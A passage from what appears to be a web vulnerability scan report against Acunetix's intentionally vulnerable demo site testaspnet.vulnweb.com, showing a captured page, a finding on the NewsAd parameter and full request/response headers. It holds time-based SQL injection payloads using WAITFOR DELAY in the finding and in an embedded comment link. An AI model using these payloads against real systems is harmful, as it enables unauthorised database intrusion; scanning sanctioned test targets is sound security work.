JlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUtQ29tbWVudHMuYXNweD9pZD0yIFdBSVRGT1IgREVMQVkgJzA6MDoxNScgLS0gZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZGJ3rwpGWEGu3UNQCqAIQuT1+ymB" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLzg+OvCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6BtYJH/7Nzuf4jw4PCPk7gWCKp" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2 WAITFOR DELAY '0:0:15' -- ">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter	NewsAd
Attack	ads/def.html' WAITFOR DELAY '0:0:15' --
Evidence
Show / hide Request and Response
Request Header - size: 524 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads%2Fdef.html%27+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:48:31 GMT Content-Length: 30706
Response Body - size: 30,706 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html'+WAITFOR+DELAY+'0%3a0%3a15'+--+" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgIC